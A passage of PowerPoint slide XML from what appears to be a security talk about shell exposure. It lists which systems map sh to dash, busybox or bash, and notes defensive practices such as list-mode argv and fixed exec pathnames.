              </a:rPr>
              <a:t>sh=&gt;dash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ourier 10 Pitch"/>
              </a:rPr>
              <a:t>2009+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Systems using ash/ksh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iOS, Android , *BSD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Mac services not exposed by default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Most embedded appliances </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Courier 10 Pitch"/>
              </a:rPr>
              <a:t>sh=&gt;busybox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Antiques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Courier 10 Pitch"/>
              </a:rPr>
              <a:t>sh=&gt;(b)?sh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ourier 10 Pitch"/>
              </a:rPr>
              <a:t>exec()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List-mode Argv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Fixed exec pathname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Courier 10 Pitch"/>
              </a:rPr>
              <a:t>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